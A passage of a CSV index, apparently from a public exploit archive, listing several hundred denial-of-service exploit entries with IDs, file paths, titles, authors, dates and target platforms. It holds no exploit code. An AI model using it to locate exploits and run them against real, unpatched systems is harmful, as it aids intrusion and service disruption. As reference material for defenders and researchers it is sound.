Overflow",2013-08-22,x90c,dos,linux,139 +27790,exploits/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,dos,osx, +27791,exploits/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,dos,linux, +27850,exploits/windows/dos/27850.txt,"Microsoft Infotech Storage Library - Heap Corruption",2006-05-09,"Ruben Santamarta",dos,windows, +27875,exploits/linux/dos/27875.c,"libtiff 3.9.5 - Integer Overflow",2013-08-26,x90c,dos,linux, +27882,exploits/java/dos/27882.java,"Sun Java Applet - Font.createFont Remote Denial of Service",2006-05-15,"Marc Schoenefeld",dos,java, +27901,exploits/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 - Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",dos,multiple, +27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,dos,linux, +27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",dos,windows, +27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Unauthenticated Remote Buffer Overflow",2006-05-29,kcope,dos,windows, +27915,exploits/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple, +27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",dos,linux, +27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,dos,windows, +27942,exploits/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",dos,hardware, +40907,exploits/windows/dos/40907.html,"Microsoft Internet Explorer 9 - IEFRAME CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,dos,windows, +27993,exploits/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",dos,multiple, +27981,exploits/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",dos,linux, +28001,exploits/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",dos,windows, +28026,exploits/linux/dos/28026.txt,"MySQL Server 4/5 - Str_To_Date Remote Denial of Service",2006-06-14,Kanatoko,dos,linux, +28065,exploits/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 - '.VMX' File Denial of Service",2006-06-19,n00b,dos,multiple, +28077,exploits/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x - Parse_User_ID Remote Buffer Overflow",2006-06-20,"Evgeny Legerov",dos,linux, +28079,exploits/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - '.wav' Crash (PoC)",2013-09-04,ariarat,dos,windows, +28080,exploits/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 - '.wav' Crash (PoC)",2013-09-04,ariarat,dos,windows, +28087,exploits/windows/dos/28087.txt,"Microsoft Office 2003 - Embedded Shockwave Flash Object Security Bypass",2006-06-22,"Debasis Mohanty",dos,windows, +28099,exploits/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - 'jscript.dll' Non-ASCII Character Denial of Service",2006-06-23,"Ivan Ivan",dos,windows, +28100,exploits/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - '.cfm' Denial of Service",2006-06-23,"Tan Chew Keong",dos,cfm, +28103,exploits/windows/dos/28103.pl,"MailEnable 1.x - SMTP HELO Command Remote Denial of Service",2006-06-24,db0,dos,windows, +28135,exploits/osx/dos/28135.pl,"Apple Mac OSX 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",dos,osx, +28144,exploits/windows/dos/28144.txt,"Microsoft Internet Explorer 6 - OutlookExpress.AddressBook Denial of Service",2006-07-01,hdm,dos,windows, +28145,exploits/windows/dos/28145.html,"Microsoft Internet Explorer 6 - ADODB.Recordset Filter Property Denial of Service",2006-07-03,hdm,dos,windows, +28160,exploits/linux/dos/28160.txt,"Gentoo-Specific MPG123 - URI Remote Buffer Overflow",2006-07-03,"Horst Schirmeier",dos,linux, +28164,exploits/windows/dos/28164.html,"Microsoft Internet Explorer 6 - Href Title Denial of Service",2006-07-04,jsz,dos,windows, +28165,exploits/osx/dos/28165.html,"Apple Safari Web Browser 2.0.4 - DHTML SetAttributeNode() Null Dereference Denial of Service",2006-07-05,"Dennis Cox",dos,osx, +28169,exploits/windows/dos/28169.html,"Microsoft Internet Explorer 5.0.1/6.0 - Structured Graphics Control Denial of Service",2006-07-06,hdm,dos,windows, +28182,exploits/multiple/dos/28182.java,"MICO Object Key 2.3.12 - Remote Denial of Service",2006-07-06,tuergeist,dos,multiple, +28194,exploits/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,dos,windows, +28196,exploits/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,dos,windows, +28197,exploits/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,dos,windows, +28202,exploits/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,dos,windows, +28207,exploits/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,dos,windows, +28213,exploits/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,dos,windows, +28220,exploits/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,dos,linux, +28222,exploits/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",dos,windows, +28227,exploits/windows/dos/28227.txt,"Microsoft Windows XP/2000 - Registry Access Local Denial of Service",2006-07-15,"David Matousek",dos,windows, +28228,exploits/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",dos,hardware, +28230,exploits/hardware/dos/28230.txt,"D-Link Routers - UPNP Buffer Overflow",2006-07-17,"Barnaby Jack",dos,hardware, +28232,exploits/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",dos,windows, +28234,exploits/linux/dos/28234.txt,"MySQL 4.x/5.x - Server Date_Format Denial of Service",2006-07-18,"Christian Hammers",dos,linux, +28237,exploits/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 - '.wav' Crash (PoC)",2013-09-12,gunslinger_,dos,windows, +28395,exploits/windows/dos/28395.txt,"VMware 5.5.1 - Partition Table Deletion Denial of Service",2006-08-15,nop,dos,windows, +28244,exploits/windows/dos/28244.txt,"Microsoft Internet Explorer 6 - DataSourceControl Denial of Service",2006-07-19,hdm,dos,windows, +28246,exploits/windows/dos/28246.txt,"Microsoft Internet Explorer 6 - OVCtl Denial of Service",2006-07-19,hdm,dos,windows, +28252,exploits/windows/dos/28252.txt,"Microsoft Internet Explorer 6 - String To Binary Function Denial of Service",2006-07-20,hdm,dos,windows, +28256,exploits/windows/dos/28256.html,"Microsoft Internet Explorer 6 - Internet.HHCtrl Click Denial of Service",2006-07-22,"Alex F",dos,windows, +28257,exploits/linux/dos/28257.txt,"GnuPG 1.4/1.9 - Parse_Comment Remote Buffer Overflow",2006-07-22,"Evgeny Legerov",dos,linux, +28258,exploits/windows/dos/28258.txt,"Microsoft Internet Explorer 6 - Multiple Object ListWidth Property Denial of Service Vulnerabilities",2006-07-23,hdm,dos,windows, +28259,exploits/windows/dos/28259.txt,"Microsoft Internet Explorer 6 - NMSA.ASFSourceMediaDescription Stack Overflow",2006-07-24,hdm,dos,windows, +28263,exploits/windows/dos/28263.c,"Microsoft Windows XP/2000/2003 - Remote Denial of Service",2006-07-24,"J. Oquendo",dos,windows, +28265,exploits/windows/dos/28265.txt,"Microsoft Internet Explorer 6 - Native Function Iterator Denial of Service",2006-07-24,hdm,dos,windows, +28266,exploits/windows/dos/28266.txt,"AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow",2006-07-24,"Tan Chew Keong",dos,windows, +28271,exploits/hardware/dos/28271.py,"Vestel TV 42pf9322 - Denial of Service",2013-09-13,HackerSofi,dos,hardware,111 +28277,exploits/multiple/dos/28277.txt,"Opera Web Browser 9 - CSS Background URI Memory Corruption",2006-07-25,hdm,dos,multiple, +28286,exploits/windows/dos/28286.txt,"Microsoft Internet Explorer 6 - NDFXArtEffects Stack Overflow",2006-07-27,hdm,dos,windows, +28293,exploits/multiple/dos/28293.txt,"Oracle 10g - Alter Session Integer Overflow",2006-07-27,"putosoft softputo",dos,multiple, +28299,exploits/windows/dos/28299.pl,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Plus Library Denial of Service",2006-07-29,"Mr. Niega",dos,windows, +28301,exploits/windows/dos/28301.txt,"Microsoft Internet Explorer 6 - Deleted Frame Object Denial of Service",2006-07-29,hdm,dos,windows, +40639,exploits/windows/dos/40639.py,"Baby FTP server 1.24 - Denial of Service (2)",2016-10-27,n30m1nd,dos,windows, +28338,exploits/linux/dos/28338.txt,"Vino VNC Server 3.7.3 - Persistent Denial of Service",2013-09-17,"Trustwave's SpiderLabs",dos,linux,5900 +28341,exploits/windows/dos/28341.txt,"Yahoo! Messenger 8.0.0.863 - File Extension Spoofing",2006-08-04,ivancool2003,dos,windows, +28343,exploits/windows/dos/28343.txt,"Microsoft Internet Explorer 6.0/7.0 - IFrame Refresh Denial of Service",2006-08-06,"Thomas Pollet",dos,windows, +28345,exploits/multiple/dos/28345.txt,"DConnect Daemon DC Chat - Denial of Service",2006-08-06,"Luigi Auriemma",dos,multiple, +28348,exploits/linux/dos/28348.txt,"Clam Anti-Virus ClamAV 0.88.x - UPX Compressed PE File Heap Buffer Overflow",2006-08-07,"Damian Put",dos,linux, +28358,exploits/linux/dos/28358.txt,"Linux Kernel 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service",2006-08-07,"James McKenzie",dos,linux, +28361,exploits/multiple/dos/28361.c,"Festalon 0.5 - '.HES' Remote Heap Buffer Overflow",2006-08-07,"Luigi Auriemma",dos,multiple, +28367,exploits/linux/dos/28367.txt,"AlsaPlayer 0.99.x - Multiple Buffer Overflow Vulnerabilities",2006-08-09,"Luigi Auriemma",dos,linux, +28369,exploits/windows/dos/28369.dpr,"IrfanView 3.98 - '.ANI' Image File Denial of Service",2006-08-09,sehato,dos,windows, +28375,exploits/windows/dos/28375.pl,"TeraCopy 2.3 - 'default.mo' Language File Integer Overflow",2013-09-18,LiquidWorm,dos,windows, +28380,exploits/linux/dos/28380.txt,"Mozilla Firefox 1.0.x - JavaScript Handler Race Condition Memory Corruption",2006-08-12,"Michal Zalewski",dos,linux, +28381,exploits/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",dos,windows, +28383,exploits/linux/dos/28383.txt,"ImageMagick 6.x - '.SGI' Image File Remote Heap Buffer Overflow",2006-08-14,"Damian Put",dos,linux, +28384,exploits/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",dos,linux, +28386,exploits/linux/dos/28386.txt,"Linux-HA Heartbeat 2.0.6 - Remote Denial of Service",2006-08-13,"Yan Rong Ge",dos,linux, +28387,exploits/windows/dos/28387.html,"Microsoft Internet Explorer 6 - 'IMSKDIC.dll' Denial of Service",2006-08-15,nop,dos,windows, +28389,exploits/windows/dos/28389.html,"Microsoft Internet Explorer 6 - 'MSOE.dll' Denial of Service",2006-08-15,nop,dos,windows, +28391,exploits/linux/dos/28391.html,"Mozilla Firefox 1.x - XML Handler Race Condition Memory Corruption",2006-08-15,"Michal Zalewski",dos,linux, +28401,exploits/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,dos,windows, +28420,exploits/windows/dos/28420.html,"Microsoft Windows Server 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities",2006-08-21,nop,dos,windows, +28421,exploits/windows/dos/28421.html,"Microsoft Internet Explorer 6 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,dos,windows, +28463,exploits/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX 'Pepco32c' Buffer Overflow",2013-09-22,blake,dos,windows, +28451,exploits/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",dos,windows, +28469,exploits/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service",2006-09-01,"David Matousek",dos,windows, +28491,exploits/multiple/dos/28491.txt,"DSocks 1.3 - 'Name' Buffer Overflow",2006-09-05,"Michael Adams",dos,multiple, +28513,exploits/windows/dos/28513.txt,"Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service",2006-09-12,"securma massine",dos,windows, +28521,exploits/osx/dos/28521.txt,"Apple QuickTime 6/7 - '.FLC' Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,dos,osx, +28542,exploits/multiple/dos/28542.pl,"Verso NetPerformer Frame Relay Access Device - Telnet Buffer Overflow",2006-09-13,"Arif Jatmoko",dos,multiple, +28561,exploits/multiple/dos/28561.pl,"Blast XPlayer - Local Buffer Overflow (PoC)",2013-09-26,flux77,dos,multiple, +28578,exploits/osx/dos/28578.txt,"Apple Mac OSX 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",dos,osx, +28588,exploits/windows/dos/28588.txt,"Symantec (Multiple Products) - 'SymEvent' Driver Local Denial of Service",2006-09-15,"David Matousek",dos,windows, +28648,exploits/freebsd/dos/28648.c,"FreeBSD 5.x - 'I386_Set_LDT()' Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",dos,freebsd, +28650,exploits/windows/dos/28650.py,"KMPlayer 3.7.0.109 - '.wav' Crash (PoC)",2013-09-30,xboz,dos,windows, +28666,exploits/multiple/dos/28666.txt,"Call of Duty Server 4.1.x - Callvote Map Command Remote Buffer Overflow",2006-09-25,"Luigi Auriemma",dos,multiple, +28726,exploits/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",dos,multiple, +28679,exploits/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,dos,multiple, +28683,exploits/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",dos,linux, +28735,exploits/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Multiple Authentication Vulnerabilities",2006-11-29,mu-b,dos,windows, +28739,exploits/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",dos,hardware, +28775,exploits/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",dos,linux, +28785,exploits/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,dos,windows, +30208,exploits/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",dos,windows, +28811,exploits/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",dos,osx, +28812,exploits/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",dos,freebsd, +28813,exploits/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",dos,freebsd, +28816,exploits/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,dos,linux, +28822,exploits/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow",2006-10-16,mmd_000,dos,windows, +28834,exploits/windows/dos/28834.txt,"Microsoft Windows XP - 'cmd.exe' Buffer Overflow",2006-10-20,"Alberto Cortes",dos,windows, +28852,exploits/hardware/dos/28852.py,"ONO Hitron CDE-30364 Router - Denial of Service",2013-10-10,"Matias Mingorance Svensson",dos,hardware,80 +28855,exploits/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,dos,windows, +28860,exploits/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",dos,windows, +40374,exploits/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",dos,windows, +28880,exploits/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service",2006-10-30,"Wojciech H",dos,windows, +28894,exploits/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",dos,windows, +28895,exploits/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service",2006-11-02,LMH,dos,linux, +28897,exploits/windows/dos/28897.txt,"Microsoft Internet Explorer 7 - MHTML Denial of Service",2006-11-02,"Positive Technologies",dos,windows, +28911,exploits/solaris/dos/28911.txt,"Sun Solaris 10 - 'UFS' Local Denial of Service",2006-11-04,LMH,dos,solaris, +28912,exploits/linux/dos/28912.txt,"Linux Kernel 2.6.x - 'ISO9660' Denial of Service",2006-11-05,LMH,dos,linux, +28948,exploits/osx/dos/28948.c,"Apple Mac OSX 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",dos,osx, +28957,exploits/android/dos/28957.txt,"Android Zygote - Socket and Fork Bomb (Denial of Service)",2013-10-14,"Luca Verderame",dos,android, +29007,exploits/osx/dos/29007.html,"Apple Safari 2.0.4 - JavaScript Regular Expression Match Remote Denial of Service",2006-11-14,jbh_cg,dos,osx, +29036,exploits/windows/dos/29036.pl,"Teamtek Universal FTP Server - Multiple Commands Remote Denial of Service Vulnerabilities",2006-11-15,"Praveen Darhanam",dos,windows, +29148,exploits/windows/dos/29148.txt,"ASF Demux for VideoLAN VLC Media Player 2.0.x - Denial of Service (PoC)",2013-10-23,"Pedro Ribeiro",dos,windows, +29076,exploits/windows/dos/29076.html,"Adobe Reader 7.0.x - Multiple Vulnerabilities",2006-11-17,"Michal Bucko",dos,windows, +29144,exploits/osx/dos/29144.txt,"Apple Mac OSX 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,dos,osx, +29161,exploits/osx/dos/29161.txt,"Apple Mac OSX 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,dos,osx, +29164,exploits/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption",2013-10-24,"Arash Allebrahim",dos,windows, +29170,exploits/windows/dos/29170.c,"Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service",2006-11-23,Hessam-x,dos,windows, +29172,exploits/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",dos,windows, +29204,exploits/netbsd_x86/dos/29204.pl,"NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow",2006-12-01,kcope,dos,netbsd_x86, +29229,exploits/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",dos,windows, +29236,exploits/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,dos,windows, +29285,exploits/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,dos,windows, +29286,exploits/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe .WMV' File Handling Denial of Service",2006-12-15,shinnai,dos,windows, +29287,exploits/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",dos,windows, +29295,exploits/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,dos,windows, +29296,exploits/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",dos,linux, +29297,exploits/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 - List Command Buffer Overflow",2006-12-19,"Joxean Koret",dos,hardware, +29305,exploits/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple, +29307,exploits/windows/dos/29307.c,"SoftMaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",dos,windows, +29310,exploits/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",dos,multiple, +29473,exploits/linux/dos/29473.txt,"Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service",2007-01-16,"David Duncan Ross Palmer",dos,linux, +29362,exploits/multiple/dos/29362.pl,"DB Hub 0.3 - Remote Denial of Service",2006-12-27,"Critical Security",dos,multiple, +40960,exploits/windows/dos/40960.svg,"Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056)",2016-12-22,Skylined,dos,windows, +29387,exploits/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",dos,windows, +29399,exploits/linux/dos/29399.txt,"Multiple PDF Readers - Multiple Remote Buffer Overflows",2007-01-06,LMH,dos,linux, +29402,exploits/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,dos,hardware, +29406,exploits/solaris/dos/29406.c,"Sun Solaris 9 - RPC Request Denial of Service",2007-01-09,"Federico L. Bossi Bonin",dos,solaris, +29441,exploits/osx/dos/29441.txt,"Apple Mac OSX 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,dos,osx, +29443,exploits/windows/dos/29443.py,"VideoLAN VLC Media Player 0.8.6a - Denial of Service (2)",2007-01-11,shinnai,dos,windows, +29444,exploits/windows/dos/29444.pl,"CA BrightStor ARCserve Backup - Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",dos,windows, +29445,exploits/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)",2013-11-05,"Necmettin COSKUN",dos,windows, +29447,exploits/windows/dos/29447.txt,"WinZip 9.0 - Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",dos,windows, +29452,exploits/osx/dos/29452.txt,"Apple Mac OSX 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,dos,osx, +29454,exploits/osx/dos/29454.txt,"Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service",2007-01-13,LMH,dos,osx, +29455,exploits/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 - '.MID' File Handling Remote Denial of Service",2007-01-15,shinnai,dos,windows, +29458,exploits/linux/dos/29458.txt,"Libgtop2 Library - Local Buffer Overflow",2007-01-15,"Liu Qishuai",dos,linux, +29461,exploits/osx/dos/29461.txt,"Apple WebKit build 18794 - WebCore Remote Denial of Service",2007-01-15,"Tom Ferris",dos,osx, +29463,exploits/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional - 'WSFTPURL.exe' Local Memory Corruption",2007-01-15,LMH,dos,windows, +29470,exploits/linux/dos/29470.txt,"Oftpd 0.3.7 - Unsupported Address Family Remote Denial of Service",2007-01-15,anonymous,dos,linux, +29502,exploits/multiple/dos/29502.html,"Transmit 3.5.5 - Remote Heap Overflow",2007-01-20,LMH,dos,multiple, +29503,exploits/windows/dos/29503.py,"KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 - Request Remote Denial of Service",2007-01-22,shinnai,dos,windows, +29509,exploits/osx/dos/29509.txt,"Apple Mac OSX 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,dos,osx, +30046,exploits/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service",2007-05-16,"M. Shirk",dos,windows, +30020,exploits/linux/dos/30020.txt,"MySQL 5.0.x - IF Query Handling Remote Denial of Service",2013-12-04,"Neil Kettle",dos,linux, +30023,exploits/windows/dos/30023.txt,"Progress OpenEdge 10b - Multiple Denial of Service Vulnerabilities",2007-05-11,"Eelko Neven",dos,windows, +30024,exploits/linux/dos/30024.txt,"LibEXIF 0.6.x - Exif_Data_Load_Data_Entry Remote Integer Overflow",2007-05-11,"Victor Stinner",dos,linux, +29520,exploits/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service",2007-01-24,"Lubomir Kundrak",dos,linux, +29523,exploits/osx/dos/29523.txt,"Apple Mac OSX 10.4.x - Software Update Format String",2007-01-25,kf,dos,osx, +29531,exploits/windows/dos/29531.txt,"Yahoo! Messenger 8.0 - Notification Message HTML Injection",2007-01-26,"Hai Nam Luke",dos,windows, +29532,exploits/osx/dos/29532.txt,"Apple Installer Package 2.1.5 - Filename Format String",2007-01-27,LMH,dos,osx, +29535,exploits/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption",2007-01-27,kf,dos,osx, +29536,exploits/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",dos,windows, +29540,exploits/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Remote Denial of Service",2007-01-30,kcope,dos,solaris, +39839,exploits/osx/dos/39839.txt,"Apple QuickTime - '.mov' Parsing Memory Corruption",2016-05-19,"Francis Provencher",dos,osx, +29683,exploits/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",dos,linux, +29545,exploits/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",dos,windows, +29546,exploits/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",dos,windows, +29551,exploits/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD '.imovieproj' Filename Format String",2007-01-30,LMH,dos,osx, +29553,exploits/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer '.help' Filename Format String",2007-01-30,LMH,dos,osx, +29554,exploits/osx/dos/29554.txt,"Apple Mac OSX 10.4.x - iPhoto 'photo://' URL Handling Format String",2007-01-30,LMH,dos,osx, +29555,exploits/osx/dos/29555.txt,"Apple Mac OSX 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,dos,osx, +29558,exploits/windows/dos/29558.c,"Comodo Firewall 2.3.6 - 'CMDMon.SYS' Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",dos,windows, +29577,exploits/php/dos/29577.php,"PHP 5.2.1 - STR_IReplace Remote Denial of Service",2007-02-09,"Thomas Hruska",dos,php, +29607,exploits/windows/dos/29607.html,"EasyMail Objects 6.x - Connect Method Remote Stack Buffer Overflow",2007-02-02,"Paul Craig",dos,windows, +29613,exploits/windows/dos/29613.txt,"CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow",2013-11-15,"Mike Czumak",dos,windows, +29616,exploits/osx/dos/29616.xml,"Apple iTunes 7.0.2 - XML Parsing Remote Denial of Service",2007-02-19,poplix,dos,osx, +29617,exploits/windows/dos/29617.pl,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)",2007-02-19,"Parveen Vashishtha",dos,windows, +29618,exploits/windows/dos/29618.c,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)",2007-02-19,Marsu,dos,windows, +29620,exploits/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",dos,osx, +29671,exploits/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",dos,windows, +29791,exploits/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC)",2013-11-23,"Akin Tosunlar",dos,windows, +29659,exploits/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service",2007-02-25,sehato,dos,windows, +29660,exploits/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,dos,windows, +29664,exploits/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",dos,windows, 